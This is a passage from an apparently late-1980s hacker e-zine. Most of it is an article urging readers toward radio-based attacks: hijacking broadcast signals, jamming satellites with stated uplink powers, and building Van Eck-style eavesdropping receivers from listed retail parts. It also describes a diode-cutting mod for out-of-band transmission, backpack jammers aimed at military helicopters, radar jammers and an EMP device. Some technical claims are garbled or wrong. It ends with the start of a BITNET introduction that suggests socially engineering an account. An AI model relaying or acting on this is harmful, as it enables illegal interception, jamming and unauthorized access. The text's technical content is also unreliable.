  4591.  
  4592. Now if such large pulses can destroy equipment on a global scale. Then the 
  4593. idea of using such forces becomes a better local tool for the destruction 
  4594. of security and measures taken to protect such devices and facilities from 
  4595. a physical standpoint. 
  4596.  
  4597. Ok now we know that the possibility of directed energy may be used to 
  4598. disrupt the communications and operations of logical devices. There 
  4599. are numerous ways to use such technology to gather and alter electronic 
  4600. impulses. Another group of examples comes closer to the common man and 
  4601. [more]       is happening all to frequently to the owner / operators of mass 
  4602. communications systems. Best know, is the interruption of signals from 
  4603. a Home Box Office satellite and the insertion of a message that stated 
  4604. its subscripton rate was to high. That one incident struck fear in the 
  4605. hearts of the communications industry and showed that anything was 
  4606. fair game. 
  4607.  
  4608. Other actions placed against commerical stations include the interception 
  4609. and signal override of 2 television stations in the Chicago area. One such 
  4610. action was placed against a Public Broadcasting station and the other was 
  4611. directed to one of the "Super Stations" in the same area. The first pirate 
  4612. transmission lasted 15 seconds and the second, two hours later, lasted 90 
  4613. seconds. The Pirate, dressed in a Max Headroom facemask, uttered some 
  4614. statement, although garbled and during the second incident, bent over and 
  4615. exposed his / her rear and was struck on the behind with a fly swatter to 
  4616. the shock of the viewers. Of course the FBI and FCC were called in to 
  4617. investigate, but investigations of this sort led to nothing more than an 
  4618. empty trail. 
  4619.  
  4620. Now to perform such deeds, one would have to contact either the station or
  4621. the local office of the FCC to find out what the transmit and studio to 
  4622. [more]       transmitter frequencies are. (And this goes for any transmitter registered 
  4623. with the FCC. They will supply the name and location, frequency, and the 
  4624. maximum legal output of such sites.) There are two frequencies used for 
  4625. each television channel. One for the Audio and the other for the Video, or 
  4626. the other option, to listen or watch the station until it sign's off for 
  4627. the day (night). This one method does not lead to possible discovery and 
  4628. the frequencies are given at sign-on and sign-off. A good example of such 
  4629. frequencies is with a station located in Philadelphia, Pa. The station, 
  4630. WPVI, transmits its audio signal on commerical FM frequencies. 
  4631. The frequency is 87.8 Mhz. Now anyone with a good transmitter could add 
  4632. anything to the signal and no one would be the wiser until they did. 
  4633.  
  4634. Examples of such transmitters and persons capable of doing this type of 
  4635. transmission is best described by the incident in the summer of 1987 
  4636. concerning Radio New York. This radio station was considered a "pirate" 
  4637. station and the federal goverment decided to move in and shut them down. 
  4638. An interesting note to all of this, was that the station was located on a 
  4639. ship anchored off the coast of New York outside US boundarys. Still the US 
  4640. goverment with agents of the FBI, FCC, Customs and the Coast Guard boarded 
  4641. the vessel, closed down the station, arrested the persons on-board and the 
  4642. ship was taken in tow. End of that particular story. 
  4643. [more]        
  4644. On the other hand, two other stories of interest deal with the possible 
  4645. and real way some may be able to jam or possibly damage state of the art 
  4646. satellite communications. The first dealt with a group who call themselves 
  4647. the American Technocratic Association based in Wilmington, Delaware. 
  4648. This groups thought revolve around the scrambeling issue in use by the 
  4649. pay TV companies. The background of the members of this group claim to 
  4650. have a good working knowwledge of military radar communications systems. 
  4651. The group claims to have the capability to jam a satellite with a few 
  4652. mobile systems it has. One operation that the group hopes to undertake 
  4653. was called "Operation Sunspot". The group claims to have areas mapped 
  4654. out that have no treaty, regulation or statute dealing with the jamming 
  4655. of a geo-stationary satellite. The one problem with all of this is that 
  4656. such a thing could happen very easily. Now there are some who say that 
  4657. such things could not happen, but if one is to look in a number of 
  4658. magazines for such information on frequencies or locations, you could 
  4659. find it. 
  4660.  
  4661. So you say to yourself that you want to try this experiment. Well we 
  4662. will not supply exact details of such techniques, but will say that 
  4663. HAM radio operators have the ability to contact both American and 
  4664. [more]       Soviet repeater satellites and if you wanted to you could do the same 
  4665. thing. Now for your basic uplink to such systems, you would need a 
  4666. transmit dish and the power behind the signal. So for a ten foot dish, 
  4667. you would need 91 watts, a six foot dish, 280 watts. It may not be 
  4668. dirt cheap to generate high powered signals in the mid range of 1-10 
  4669. Ghz, but it does not present a great techincal obstacle and surplus 
  4670. gear is so easy to obtain.  
  4671.  
  4672. You don't need large dishes with great amounts of power to do this. 
  4673. All that is needed is a moderate size dish, a few tens of watts at 
  4674. microwave frequencies, and Bingo! You've got an effective satellite 
  4675. jamming station! And then you have to address the issue of the 
  4676. telemetry channel. THey may not be able to overtake the signal, but if 
  4677. jam the signal with another, it may be possible to affect the 
  4678. operation, stability or orbit of the target. Frequencies for such 
  4679. channels are available from a number of sources and for as little as 
  4680. $2.50 per frequency.  
  4681.  
  4682. Now these examples and the reported stories dealing with television 
  4683. stations interuption's are fast becomming one of the most feared aspect 
  4684. of open air transmissions. Such transmitter frequencies are no longer the 
  4685. [more]       domain of commerical radio and television stations. Transmissions on any 
  4686. frequency are just a phone call away from suppliers who provide common
  4687. or business radio transmission technology. 
  4688.  
  4689. So if satellite and television stations can be interupted by such 
  4690. forces, six million dollar helicopters are taken down because of CB 
  4691. radios, and automobiles cease to operate due to a wide spectrum of 
  4692. emmited signals, then the possibility to intercept and harvest vast 
  4693. amounts of knowledge is available to those who wish to gather such. 
  4694.  
  4695. Now to explain such basic interceptions are now commonplace with 
  4696. horrific results to those who do not believe that such things can 
  4697. happen. For a simplistic view of such emmited signals, take a standard 
  4698. "Walkman" type of radio and visit one of the many locations of ATM's 
  4699. or better known as "money machines". (This excerise may also be performed 
  4700. near any standard personal computer if such machines are not available.) 
  4701. and tune through the FM band. With careful tuning, one will be able to 
  4702. "hear" machine funcitions occuring. Taking basic simple electronics, one 
  4703. may have the ability to recieve and reconstruct such impulses to a 
  4704. readable form. 
  4705.  
  4706. [more]       Or an example of larger scale and better know, would be with the use of 
  4707. back-yard home satellite dishes. Dishes range from 6 to 12 feet wide. 
  4708. Signals available include music, sports, news, movies, stock and 
  4709. commodity trading quotes, weather, education and other such information 
  4710. services. In addition to these services, a number of different multi-site 
  4711. conference services are available from a host of major hotel chains as 
  4712. well as privatly organized meetings held for specfic time periods and 
  4713. dates. All may be tuned through the use of a dish and sensitive 
  4714. information that may not be available to someone, is then made available 
  4715. and no one is the wiser! Transponders are not private, and are rented out 
  4716. for only the time used. And one other thing that might bring you to your 
  4717. senses about such signals, is that the signals are transmitted by the 
  4718. satellite over a wide area to anyone who can recieve such signals. 
  4719.  
  4720. One other development is the small Micro-Sat by Norsat. This complete 
  4721. system offers both satellite bands coverage, Ku and C, a small dish and 
  4722. circuit board that fits inside an IBM PC. The unit downblocks 950 Mhz to 
  4723. 1.45 Ghz, offers a maximum baud rate of 9600 bps, frequency, bandwidth, 
  4724. video and audio selectable formats and may be connected to the 
  4725. VideoCipher II, B-Mac and Oak Orion descrambling systems. 
  4726.  
  4727. [more]       Some other such signal reconstruction devices are now also available 
  4728. through the mails. One such device is available in plan form from 
  4729. Don Britton Enterprises and is called the Re-Process Sync Amplifier. 
  4730. The device was developed to recieve signals emmanated from cable 
  4731. television systems. What the device does in essance, is to take a 
  4732. signal that "leaks" from cable tv systems and recieves such, adds a 
  4733. sync signal needed by the television set to display the recieved 
  4734. signals and then sends the signal to the antenna input of the set so 
  4735. that display may happen. Now if weak signal reception is available from 
  4736. leaking cable systems, then the ability to recieve weak signals from 
  4737. logical devices is also possible. 
  4738.  
  4739.  
  4740. Interception and Weapons Possibilities
  4741. --------------------------------------
  4742.  
  4743. Think about possible interception points pertaining to logical 
  4744. security methods. Communications may be encrypted, data may be stored 
  4745. in an in-active form and access is only a matter of time while the 
  4746. interceptee is waiting for the dispersal. The next security concerned 
  4747. area covered would be for the encryption of the information in its 
  4748. [more]       stored and transmitted form. The encryption is all wonderful and good 
  4749. for the transmission and storage, but does nothing for the information 
  4750. as it is in its final stage to the human eyes! And you only have two 
  4751. ways to get it to the eyes, in hard copy or by a video screen. 
  4752.  
  4753. Now you think that interception is not possible since the information is 
  4754. encrypted, but the data must be decrypted so that the human connection 
  4755. may use the information. The human connection allows for the reception 
  4756. of said information by the afore mentioned devices and lets interception 
  4757. to happen through the clear or decryption points of the attacked devices. 
  4758.  
  4759. And one other point to mention; other possible effects of reception / 
  4760. transmission to security in general, could affect other controls ranging 
  4761. from building energy management to security access and monitoring 
  4762. controls.
  4763.  
  4764. To give a better understanding of such equipment, we will discuss 
  4765. some of the devices known. One such device known as the Van Eck device 
  4766. and the other is called the Re-Process Sync Amplifier. Some may feel that 
  4767. there are two different systems involved in this discussion, but the 
  4768. author finds no major difference between the two, with the exception of 
  4769. [more]       the Van Eck device is built for operation on European voltages and has a 
  4770. built-in digital frequency meter. The one major difference found is with 
  4771. the dates of copyrights for the two devices. The Don Britton device is 
  4772. dated 1979, while the Van Eck unit is dated October,1985.   
  4773.  
  4774. Note: Another unit, with plans for such devices, are available from 
  4775. Consumertronics, located in Alamorgordo, New Mexico. Besides the plans 
  4776. for a Van Eck type reader, one book offers information in reference 
  4777. to computer crime and countermeasures, how systems are penetrated, BBS 
  4778. advice, Password defeats, TEMPEST, crosstalk amplifiers and a 200 word 
  4779. phreaking terms glossary. All for only $15.00 
  4780.  
  4781. We will begin with a basic understanding of the inner workings of the 
  4782. device. The one other major basic difference with the two reader boxes is 
  4783. that the Van Eck box is designed for use with tv's and VDT's used in 
  4784. Europe as compared with the Britton box built for use in the United 
  4785. States. This device in general, is designed to restore and regenerate the 
  4786. sync and colorburst signals and ignores all information appearing during 
  4787. either the vertical or horizontal blanking. Its basic result is 
  4788. reconfigure through the use of supplying artifical external signals 
  4789. inputed directly to any video monitor through a simple 10-50 dollar 
  4790. [more]       modification of the TV or video monitor, or in simple english, takes a 
  4791. weak video signal and tries to shape or match it and then boost its 
  4792. output to a normal television screen. 
  4793.  
  4794. One other interesting thought comes to mind with the use of video tape 
  4795. copy protection methods. Since these methods use a means that makes it 
  4796. tough on the VCR not the TV from generating signals for tape duplication, 
  4797. there have been a number of devices that assist in the retoring and 
  4798. re-structure of the picture and sound. One device is known as the 
  4799. "Line Zapper". The device helps to adjust the brightness changes, vertical 
  4800. jumping and jittering, and video noise. It is available in kit or complete 
  4801. form. Pricing starts at $69.95 and complete tested units cost $124.95. 
  4802. Now if this unit can assist in the filtering and structuring of 
  4803. commerically induced weak signals, then it should be able to take a 
  4804. boosted signal presented to it and clean the picture to something of 
  4805. useable form. Some may see this only as a filter for video processing 
  4806. with a focal point on the actual copy-guard techniques, but such a 
  4807. device incorporated into the Van Eck type of gear should assist in the 
  4808. overall signal restructuring. 
  4809.  
  4810. Now one other interesting point about possible video signaling 
  4811. [more]       re-construction methods was addressed in a multi-part series published in 
  4812. Radio-Electronics based on the methodology used for the construction of 
  4813. video signals scrambeled by different vendors of cable and over-the 
  4814. air pay television. The series dealt with all aspects and methods of 
  4815. video and audio, (complete with discussions on the DES methods used for 
  4816. the VideoCipher units and the like,) used in commerical systems in use. 
  4817.  
  4818. One other thought comes to mind of an experimental nature. Since the 
  4819. screen of a computer is not always changing and for the most part stable 
  4820. in its display, why not take the recieved signal and digitize it! 
  4821. You could filter out signal noise clean up any true video signal present. 
  4822. This is no great techno-wonder, the basic gear could be put together with 
  4823. Radio Shack or the like types of equipment. And the cost is still most 
  4824. reasonable. If not available there, costs for home-brew gear would not be 
  4825. that high. The simple electronics blocks would consist of comparators, 
  4826. video detectors, data seperator gates, a to d - d to a converters, 
  4827. data amp and a signal level converter. 
  4828.  
  4829. Or the better version, might be a modified slow scan television system 
  4830. with error correction and clean-up circuits. Such units work over normal 
  4831. phone lines or standard radio channels and since the units can take 
  4832. [more]       signals from these two different types of inputs, there should be no 
  4833. problem in adapting the unit to accept a cleaned up analog signal from a 
  4834. digitizer. 
  4835.  
  4836. Away from the world of the experimental thoughts, we return to the 
  4837. point at hand....
  4838.  
  4839. Now there are two types of monitors used today. The first, called 
  4840. composite and the second using TTL logic to control the screen and its 
  4841. pattern. The composite screen is nothing more than a television set or 
  4842. Apple computer type of monitor. The construction of the picture is 
  4843. performed by a beam of electrons that are scanned across the screen at a 
  4844. rate of 525 lines per second. Since the majority of screens are of a 
  4845. composite nature ( this is even true in most IBM environments) the 
  4846. ability to recieve the signal is very possible from a radio emmission 
  4847. standpoint. 
  4848.  
  4849. The reception of such signals is not fairytales, but comes with reality 
  4850. attached through the use of simple electronics. The first part of the 
  4851. reception project is to have a method of signal acaquisition and 
  4852. amplifcation. Such gathering may be performed by the use of standard 
  4853. [more]       electronics store technology. For this example, we will use common 
  4854. Radio Shack electronics. The reason is due too the common variety 
  4855. electronics that are available to most persons needing such science to 
  4856. accomplish the required gathering. 
  4857.  
  4858. To start, since a base station is out of the question due to the weak 
  4859. signals one would have to recieve. So the need for transportable equipment 
  4860. is a must. Antenna, amplifier, sync process unit and display medium 
  4861. must be powered in the transit unit. Depending on budget and (BEL) 
  4862. (Basic Equipment List) requierments a fully battery operated set-up 
  4863. can be constructured for under ................       
  4864.  
  4865.  
  4866. Our two systems described here will be different only in basic 
  4867. construction and budgetary BEL's.
  4868.  
  4869. The "Radio Shack" Reader 
  4870. ------------------------
  4871. 1. The antenna could consist of a Radio Shack TV/FM # 15-1611 for 49.95
  4872.  
  4873. 2. If needed, Radio Shack in-line signal amplifier 10 db gain # 15-1117
  4874. [more]          for 15.95
  4875.  
  4876. 3. Radio Shack RF Video Modulator # 15-1273 for 26.95 
  4877.  
  4878. 4. The Britton or Van Eck unit (Cost unknown due to construction needs)
  4879.  
  4880. 5. The tuning unit may consist different available FM,TV,UHF tuners 
  4881.    available for the tuning of TV Sound & Picture reception and 
  4882.    possible recording. Costs for such units range from 319.95 to 119.95 
  4883.    The 319.95 unit can operate on AC / DC, has audio / video input jacks 
  4884.    and can operate on 9 "D" batteries. Other possible useable units would 
  4885.    be # either # 16-109 or 16-111. The units cost 219.95 and the other 
  4886.    159.95  Both are able to tune in the full commerical AM / FM and 
  4887.    VHF/UHF Television signals, The low end of the cost spectrum would 
  4888.    be the RS # 16-113 at 119.95 This unit also has the same spectrum 
  4889.    tuning abilities. 
  4890.  
  4891.  
  4892. The Gold Plated Unit
  4893. --------------------
  4894.  
  4895. [more]       1. The antenna could consist of a Radio Shack TV/FM # 15-1611 for 49.95
  4896.    (Or due to the use of better reception electronics having built in 
  4897.    antennas. But due to the need for amplified signals being inputed 
  4898.    to the reciever we will still possibly use the RS amplified antennas.)
  4899.    a. It is also possible to use any number of amature radio antennas. 
  4900.    For the purpose of maintaining a low profile, we will use one of the 
  4901.    standard active recieving antennas that has a spectrum of reception 
  4902.    from 50Mhz to 1 Ghz. Such units are available from mail order supply 
  4903.    houses.
  4904.  
  4905. 2. If still needed, Radio Shack in-line signal amplifier 10 db gain 
  4906.    # 15-1117 for 15.95 It is also possible to use # 15-1105 Indoor FM 
  4907.    Signal Booster with switchable 0,10 or 20 Db gain at a cost of 24.95.
  4908.  
  4909. 3. Radio Shack RF Video Modulator # 15-1273 for 26.95 
  4910.  
  4911. 4. The Britton or Van Eck unit (Cost unknown due to construction needs)
  4912.  
  4913. 5. Tuning units- The tuning units would consist of 2 seperate radio 
  4914.    units. The units, both ICOM's have a combined tuning range of 100 Khz 
  4915.    to 2 Ghz. 
  4916. [more]        
  4917. a. Unit 1 (R-71a) tunes from 100 Khz to 30 Mhz. This unit is nothing more 
  4918.    than a shortwave reciever with excellent signal reception and frequency 
  4919.    stability that offers far better overall signal interception quality.
  4920.    The unit offers 1 Hz tuning and has digital frequency readout. 
  4921.    As an option, this unit may be controlled by an IBM or compatable PC.
  4922.    Cost for this unit is $949.00
  4923.  
  4924. b. Unit 2 (R7000) covers 30 Mhz to 2 Ghz. This unit is a general coverage 
  4925.    reciever with excellent signal reception and frequency stability that 
  4926.    offers far better overall signal tuning and interception quality. 
  4927.    
  4928.    Also this unit can be computer controlled through an IBM or 
  4929.    compatiable. The unit offers .01 Hz tuning and has digital frequency 
  4930.    readout. Additional abilities of the unit include signal output and a 
  4931.    IF output of 10.7 Mhz with other frequencies available. The cost for 
  4932.    the unit is $1099.99. This particular unit also has an option for the 
  4933.    output of the video signal and connection of any standard video monitor 
  4934.    for 130 dollars. For an additional 160 dollars the unit can have the 
  4935.    ability to recieve signals from 20 Khz and go all the way to the 
  4936.    specified 2 Ghz. The unit needed is called a Kuranishi FC-7000 
  4937. [more]          frequency converter. With additional commerical television MDS tuning 
  4938.    equipment, ranges can exceed 2.7 Ghz. Costs for this will range 
  4939.    between 79 and 109 dollars. Since we will be mostly dealing in the 
  4940.    lower ranges of frequencies, an added piece of gear may be used to gain 
  4941.    the best signal reception points available. This is through the use a 
  4942.    Radio Direction Finder available from American Electronics for 100 
  4943.  
  4944.    dollars. 
  4945.  
  4946. Now with all this equipment for both systems, another basic system 
  4947. with minumum cost is readilly available to many for under 100.00 
  4948. dollars. This we speak,of is the common Black & White Television set 
  4949. available in mass quanties from any number of sources. It has been 
  4950. reported that such interception capabilities are possible and have 
  4951. occured without the interceptee knowing until the Communications 
  4952. Commission have contacted the source of the emmited signals. 
  4953.  
  4954. For example, some personal computers and their respective screen have 
  4955. been known to been picked up on the TV screens of their neighbors and 
  4956. through nothing more than rough or fine tuning the reception. The reason 
  4957. is due to the TV having the ability to automatically adjust the Sync 
  4958. [more]       signals to those close to the frequency of intercepted computer screens 
  4959. sync frequency. This "ability" is available through the use of a common  
  4960. manual type tuner on a standard Black & White set with a normal 
  4961. directional antenna and an standard antenna amplifier. All three 
  4962. devices in common life and attached to your own television recievers!
  4963.  
  4964. You have such devices if you have an antenna on your roof or attached 
  4965. to your set. Most have attached signal amplification due to the ever
  4966. growing background noise generated by normal commerical stations and 
  4967. reception charictersistic In simple term, the guy next door can read 
  4968. your screen and you don't know it. Now take the number of personal type 
  4969. computers in a standard corporate environment, caulculate the possible 
  4970. dollar figures of the combined information contained in these machines, 
  4971. and substantial sums become more evident than ever before. If business 
  4972. plans, formulas or patent-trade information, client lists, or any 
  4973. other type of valuable information and since that information will be 
  4974. called up at any time or current work performed is wanted in the 
  4975. surveillance gathering operation and then you have a completely wide open 
  4976. way of monitoring the daily practices and transactional actions with 
  4977. complete impunity and securty of such areas is completely unguarded due 
  4978. to the lack of knowledge. 
  4979. [more]       
  4980.  
  4981. For experimental purposes, we will use very simplistic computer systems
  4982. to give an idea of what may be possible. The equipment shall be basic, 
  4983. over the counter, cheap, electronic systems to gather and produce the 
  4984. signals we which to collect. 
  4985.  
  4986. The equipment list is as follows:
  4987.  
  4988. 1. Franklin Ace 1200 (Apple II compatiable)    
  4989.  
  4990.    a. Franklin Ace Serial / Paralell Card 
  4991.       (Paralell card is in use for the 2 printers.)
  4992.  
  4993.    b. Apple Super Serial Card (RS-232) for use with the communications 
  4994.       modem.
  4995.  
  4996. 2. Franklin Video Monitor (40 or 80 characters display)  18 Mhz 
  4997.  
  4998.    ( Standard IBM monitors radiate at 15 to 16 Mhz )
  4999.  
  5000. [more]       3. Prometheus ProModem 1200 (External type)
  5001.  
  5002. 4. Printers
  5003.  
  5004.    a. Okidata Microline 92
  5005.  
  5006.    b. Epson MX-80
  5007.  
  5008. Our basic reception / interception equipment consists of:
  5009.  
  5010. 1. Bearcat 250 (50 Channel) Scanner
  5011.  
  5012.    (Coverage from 32-50,146-148,148-174,420-450,450-470,470-512 Mhz)
  5013.  
  5014. 2. Soundesign FM Stereo Tuner (86.5 Mhz to 109.5 Mhz)
  5015.  
  5016. 3. Electrobrand AM-FM-SW-CB-TV-PB-AIR-Weather 
  5017.  
  5018.    The AM and FM are standard commerical band recievers.
  5019.  
  5020.    SW is short-wave from 4 Mhz to 12 Mhz
  5021. [more]        
  5022.    TV coverage is from audio channels 2 through 13
  5023.  
  5024.    AIR band from 108 through 135 Mhz
  5025.  
  5026.    Public Band is 145 through 175 Mhz
  5027.  
  5028. 4. A Gould OS 1100 A Osocilliscope 25 Mhz range 
  5029.  
  5030.  
  5031. Since we will not try to re-construct the actual video signal generated, 
  5032. as this has already been done, we will not have to explain what we recieve 
  5033. as a picture. What we will cover is the gross signal output of standard 
  5034. population computerized logical systems. 
  5035.  
  5036. In our observations, we have seen a wide spectrum of emmitted signals 
  5037. with a strong signal between 9.0 and 9.250 Mhz for the display of 
  5038. standard text scrolling by. Better signal display was found at the 
  5039. lower frequencies of 9 Mhz. Monitor frequencies were found in the area 
  5040. of 11 through 19.5 - 20 Mhz. Printer frequencies are in the range of 
  5041. 140 to 200 Mhz. Disk operations were detected in the ranges of 88 to 
  5042. [more]       250 Mhz. Overall frequency generation was from 4 through 500 Mhz. 
  5043. The modem was found between 28 and 300 Mhz. All in all, this easy 
  5044. discovery of radiated or transmitted signals by means of common radio 
  5045. technology could lead to. 
  5046.  
  5047. An interesting thought comes up with the use of some common ham 
  5048. transcievers for such operations, and with simple, easy modifications, 
  5049. some can transmit on all frequencies from 1.6 t 30 Mhz. Such a transmitter 
  5050. would be the Kenwood 440. This transciever offers 100 watt output and as 
  5051. stated all frequency transmit. To perform the small modification, all one 
  5052. would have to do is cut one lead to a diode (Diode D 80) and as an added 
  5053. bonus for better frequency  readout, you gain an additional readout of 
  5054. 10 Hz by snipping the lead to Diode 66. So the unit covers the range of 
  5055. IBM PC frequencys in use and all of the Apple systems too. Thats says it 
  5056. all! It can offer the possibility for disruption of internal signals used 
  5057. to process information and the possibility of causing other logic related 
  5058. systems to act or not without reason. 
  5059.  
  5060. For example, would it be possible for the Soviets to sit under cover with 
  5061. a modified Kenwood 440 100 watt radio or better yet, a Radio Shack 40 
  5062. channel AM / SSB and a 100 watt Firebird linear amplifier and a simple 
  5063. [more]       small antenna to disperse the signal. So the problem of the 6 million 
  5064. dollar helicopter comes down to a wholesale cost of 150.00 ( 190.00 to 
  5065. 200.00 for an average rip-stop nylon camping backpack unit ) per man with 
  5066. a recommended dispersal of 3 manpacks per unit into the theater. 
  5067. Suspected effective ranging up to 3 miles per man pack unit is suggested. 
  5068.  
  5069. Or even better, if such things were possible against military aircraft 
  5070. or normal commerical real world autos, then directed intent should be 
  5071. of now problem against civilian targets such as computer installations, 
  5072. bank and operations support structures, possible override of security 
  5073. systems and any other systems that may be affected by such forces. 
  5074.  
  5075.  
  5076. Other uses of directed energy may be used in law enforcement situations 
  5077. for the apperhension of suspected persons in late model automobiles. 
  5078. If the truckers are using the radios for game playing, then why can't the 
  5079. police have the same type of device for the stopping of autos? There are a 
  5080. number of devices that will radiate such energies over the spectrum. 
  5081. One such device would be the Radar Speed Gun Calibrator (or better know as 
  5082. a radar jammer) for use with calibration of speed guns or for the 
  5083. deceiving of police radar units. The plans for such units were (are) 
  5084. [more]       available for a number of sources. One such source, is Philips Instrument 
  5085. Company or another such source was the Radio-Electronics issue in the 
  5086. spring or summer of 1987 with plans for the Radar Speed Gun Calibrator, 
  5087. that would allow you to transmit a signal that would equal the same type 
  5088. of reflected signal from an automobile traveling at the supposed testing 
  5089. speed. Range's of speed signal output would equal 5 mph to well over 
  5090. 100 mph. 
  5091.  
  5092. Some plans or kits come with instructions for the combination of radar 
  5093. jammer units with most commonly available auto radar detector units. 
  5094. In simple terms, the radar detector unit detects a signal and through 
  5095. its display or attention getting circuitry in turn activates the radar 
  5096. jamming equipment to deceive or jam the police transmitter / reciever 
  5097. units. Best know of such combinations, were the use of Escort radar 
  5098. detectors and jammer units with transmission horns mounted behind the 
  5099. front grill of autos. No ifs, ands, or buts, they work! 
  5100.  
  5101. One other piece of equipment that may have devastating effects on overall 
  5102. security and support systems, deals with the generation of very high 
  5103. energy pulses that might be classified as being able to generate EMP's 
  5104. that could damage almost any piece of electronic gear. The claim from the 
  5105. [more]       designer is that this device can generate a pulse with an effective range 
  5106. of multi-millions of watts. The device on average will produce a pulse 
  5107. equal to 400,00 wats in a testing mode with the multi-million outputs 
  5108. available with full charging of the capacitor banks peaked. Also stated in 
  5109. this book is the ability of the unit to produce a very large inductance in 
  5110. near by electronic gear. Most interesting! And the only statement in this 
  5111. book about the device and it's short comming, has to deal with the 
  5112. in-ability of the device to produce sufficent output used in certain 
  5113. nuclear experiments. I wonder what that means?  
  5114.  
  5115. So, in closing, the capability of these units is well within the range of 
  5116. any person with the intent comes closer to home than ever before. 
  5117. The equipment is nothing of major technical wonderment, just a few simple 
  5118. block circuits put together to each other so that they work together to do 
  5119. the final requested product. And all of the described gear or plans may be 
  5120. in the hands of everyday persons even if they don't know it! And while 
  5121. most do not have such knowledge about how such systems may be used to 
  5122. corrupt other systems, or even how the average telephone or toaster may 
  5123. work, they will still state that such described technology is not 
  5124. possible, and open the door to major disaster due to complete ignorance to 
  5125. the problem. In closing, to steal a phrase from someone 
  5126. [more]       else, "The truth shall set you free (or may keep you from being over 
  5127. exposed from free form energy)!
  5128.  
  5129.  
  5130. "Click!"  And the last words spoken by the corporate DP offical were...
  5131.  
  5132. " Thats impossible! You could never do that to my operation!"
  5133.  
  5134. Ahem, Sure sir, Sure!
  5135.  
  5136. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  5137. =                   P/HUN Issue #3, Volume 2: Phile #9 of 11                  =
  5138. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  5139.  
  5140.                           An introduction to BITNET
  5141.                           -------------------------
  5142.  
  5143.                                By Aristotle
  5144.                               Jan 17, 1989
  5145.  
  5146.  
  5147. [more]                About BITNET:
  5148.  
  5149.               Because It's Time NET (BITNET) is the largest of the
  5150.          acedemic computer networks and one of the largest mainframe
  5151.          networks.  BITNET connects hundreds of thousands of students
  5152.          and professors in Asia, Europe, Middle East, and North
  5153.          America.  In 1988, BITNET had nearly 2000 computer systems at
  5154.          higher institutions connected to it.  BITNET may not allow
  5155.          you to log onto mainframes, BUT it IS an invaluable source of
  5156.          information.  While on BITNET, you can access certain
  5157.          services such as chat relays, file servers, electronic mail
  5158.          service, and info servers. (See below for more info)
  5159.  
  5160.  
  5161.          A little semi-technical info:
  5162.               The mainframes on BITNET are connected via constantly
  5163.          operating telephone lines or satellite links.  Unlike
  5164.          packet-switching networks (ie. Telenet), BITNET is a store
  5165.          and forward network.  That means that if you send a message
  5166.          from Florida to Kentucky, the computers in the network
  5167.          between Florida and Kentucky will store and forward it from
  5168. [more]                each computer to computer until it reaches Kentucky.
  5169.  
  5170.  
  5171.               In BITNET there's only one path from Kentucky to
  5172.          Florida.  Each computer is called a NODE.  Below is an
  5173.          illustration of how a small section of the network would look
  5174.          like.
  5175.  
  5176.  
  5177.  
  5178.              A----B----C
  5179.              |    |    |
  5180.              D----E----F----G
  5181.              |         |    |
  5182.              H         I----J ---K
  5183.  
  5184.  
  5185.          Example A.
  5186.          A message traveling from A to H would travel the following
  5187.          path:
  5188.          A-D-H
  5189. [more]       
  5190.          Example B.
  5191.          A message traveling from A to F could travel one of two ways.
  5192.          These are:
  5193.          A-B-C-F  or A-D-E-F
  5194.  
  5195.               Sometimes when a node is down, the message may be
  5196.          delayed or routed through different nodes as in example B.
  5197.  
  5198.  
  5199.               The time to transfer messages can vary from just a few
  5200.          seconds to an hour.  This cause for this is usually one (or
  5201.          both) of two reasons.  The first factor is the size of the
  5202.          message.  Larger amounts of data take longer times to
  5203.          transmit.  The second factor is the status of the network.
  5204.          As we all know, computers are prone to breaking down.
  5205.          Messages that cannot be routed past the downed node are
  5206.          stored in the net until there is a clear path to it's
  5207.          destination.
  5208.  
  5209.  
  5210. [more]                Addresses:
  5211.  
  5212.               Each of the mainframes(NODE) on BITNET has it's own
  5213.          individual address.  The addresses are usually an
  5214.          abbreviation of the name of the institution that supports the
  5215.          mainframe.  One example is the University of Massachusettes
  5216.          "UMASS".
  5217.  
  5218.  
  5219.               The indiviuals that have access to BITNET also have
  5220.          their own addresses.  These addresses are assigned to the
  5221.          user when he/she first sends information over BITNET.  The
  5222.          entire address for a user is set up as follows:
  5223.  
  5224.  
  5225.  
  5226.          University of Kentucky Prime--+
  5227.                                        |
  5228.          @ (AT)----------------------+ |
  5229.                                      | |
  5230.          User ID-------------------+ | |
  5231. [more]                                          | | |
  5232.                                    | | |
  5233.                                    | | |
  5234.                                    | | |
  5235.                                    | | |
  5236.                                  $108@UKPR
  5237.  
  5238.          Note: Not all addresses give indication of the type of
  5239.          system.
  5240.                Also: On some machines, the BITNET ID will be different
  5241.          from the system ID.  Ex. CS.DEPT.SMITH.J@UKPR is also
  5242.          $108@UKPR.
  5243.  
  5244.  
  5245.  
  5246.          Access:
  5247.  
  5248.               It is IMPOSSIBLE to access BITNET unless you can gain
  5249.          access to one of the nodes.  That means, there are NO
  5250.          dial-ups that do not go through a mainframe.  BITNET is
  5251.          supported by the institutions that have access to it and it
  5252. [more]                is your right as a student to have access.  It is NOT your
  5253.          right to access the mainframe though.  A good way to gain
  5254.          access to BITNET is to go to your local university and ask or
  5255.          engineer an account for the use of BITNET.
  5256.  
  5257.  
  5258.  
  5259.          Uses:
  5260.  
  5261.               There are three basic methods of communicating via
  5262.          BITNET: mail, message, and file.  Each method has it's own
  5263.          advantages and disadvantages.
  5264.  
  5265.  
  5266.               The interactive message (Let's just call it a message)
  5267.          is the fastest and most convenient method of transitting
  5268.          short amounts of information over BITNET.  Messages are
  5269.          composed of one line of information that is sent VERY quickly
  5270.          to it's destination.  You would use the message when chatting
  5271.          with someone at a different node.  The bad part about
  5272.          messages is that if a node is down, your message is lost.
  5273. [more]                You WILL recieve an error message though.
  5274.  
  5275.               Messages are usually sent via the TELL and SEND
  5276.          commands.  Below are examples of the syntax for sending a
  5277.          message on the VM/CMS and Prime systems:
  5278.  
  5279.  
  5280.          TELL userid@node message
  5281.  
  5282.          or
  5283.  
  5284.          TELL 151133@DOLUNI1 Hey Terra, How are the guys at CCC
  5285.          doing?
  5286.  
  5287.  
  5288.          Mail:
  5289.  
  5290.               Electronic mail is the most versatile method of
  5291.          communication on BITNET.  Unlike the message, a letter will
  5292.          be stored if a node is down.  A letter can be from one word
  5293.          of text to however long you want it.  It has been suggested
  5294. [more]                to me to NOT transmit any mail over 3000 lines long (hmmm,
